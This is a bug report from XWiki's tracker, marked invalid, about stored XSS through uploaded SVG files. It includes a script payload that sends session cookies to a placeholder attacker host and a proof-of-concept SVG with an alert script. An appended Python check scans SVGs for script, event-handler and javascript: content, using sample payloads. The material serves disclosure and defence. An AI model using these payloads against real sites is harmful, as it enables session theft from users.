Details
- Bug
- Resolution: Invalid
- Blocker
- None
- 17.3.0
- None
- Unknown
- N/A
- N/A
Description
An SVG file uploaded can store XSS payloads. Any editor, even comments, can store XSS. Since SVG files are just XML files, JS can be stored. A user can copy the link to the file and send it to another user and have access to their session cookie in the context of the application.
A realistic attack scenario:
Attacker uploads an SVG with the following payload:

    <script> var cookies = document.cookie; var img = new Image(); img.src = "http://attacker-site.com/steal.php?cookies=" + encodeURIComponent(cookies); </script>
The attacker then right-clicks on the SVG to copy the URL to where the SVG is located.
The attacker sends the link to the victim or pastes it into another comment reply.
The victim will see that the URL belongs to the trusted domain and click.
The XSS payload will then be executed in the context of the application.
This, saved as xss.svg, can be used to replicate the video:

    <?xml version="1.0" standalone="no"?>
    <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
    <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
      <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
      <script type="text/javascript"> alert('xss'); </script>
    </svg>
I have attached a video demoing how to store the payload.
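The following is an added example, not part of this report or of XWiki's code: a defender-side pre-upload check that flags the active-content carriers an SVG can hold (script elements, on* event handlers, javascript: URIs), run against a copy of the xss.svg above, plus the response headers one would attach when serving such a file so the browser downloads it instead of rendering it. Function names and the sample inputs are constructed for this example.

```python
"""Scan an uploaded SVG for active content before accepting or serving it.
Uses only the standard library; the stdlib expat parser does not fetch
the external DTD referenced by the DOCTYPE."""
import xml.etree.ElementTree as ET


def local_name(tag: str) -> str:
    """Strip the namespace from an ElementTree name like '{ns}script' or '{ns}href'."""
    return tag.rsplit("}", 1)[-1]


def find_active_content(svg_text: str) -> list[str]:
    """Return human-readable findings in document order; an empty list means none seen."""
    findings = []
    root = ET.fromstring(svg_text)
    for elem in root.iter():
        name = local_name(elem.tag).lower()
        if name == "script":
            findings.append(f"<{name}> element")
        for attr, value in elem.attrib.items():
            attr_name = local_name(attr).lower()
            if attr_name.startswith("on"):  # onload, onclick, onmouseover, ...
                findings.append(f"{attr_name} handler on <{name}>")
            if attr_name == "href" and value.strip().lower().startswith("javascript:"):
                findings.append(f"javascript: URI in href on <{name}>")
    return findings


def download_headers(filename: str) -> dict[str, str]:
    """Headers that make a browser save an untrusted SVG rather than execute it inline."""
    return {
        "Content-Type": "image/svg+xml",
        "Content-Disposition": f'attachment; filename="{filename}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }


# Constructed samples: the report's xss.svg, a benign file, and one using handlers/URIs.
REPORTED_SVG = """<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript"> alert('xss'); </script>
</svg>"""
CLEAN_SVG = '<svg xmlns="http://www.w3.org/2000/svg"><circle r="5" fill="#0a0"/></svg>'
HANDLER_SVG = ('<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"'
               ' onload="alert(1)"><a xlink:href="javascript:alert(2)"><text>x</text></a></svg>')

if __name__ == "__main__":
    for label, svg in [("reported", REPORTED_SVG), ("clean", CLEAN_SVG), ("handler", HANDLER_SVG)]:
        print(label, find_active_content(svg) or "no active content")
```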
Attachments
Issue Links
- is related to XWIKI-18368 XSS through SVG download (Closed)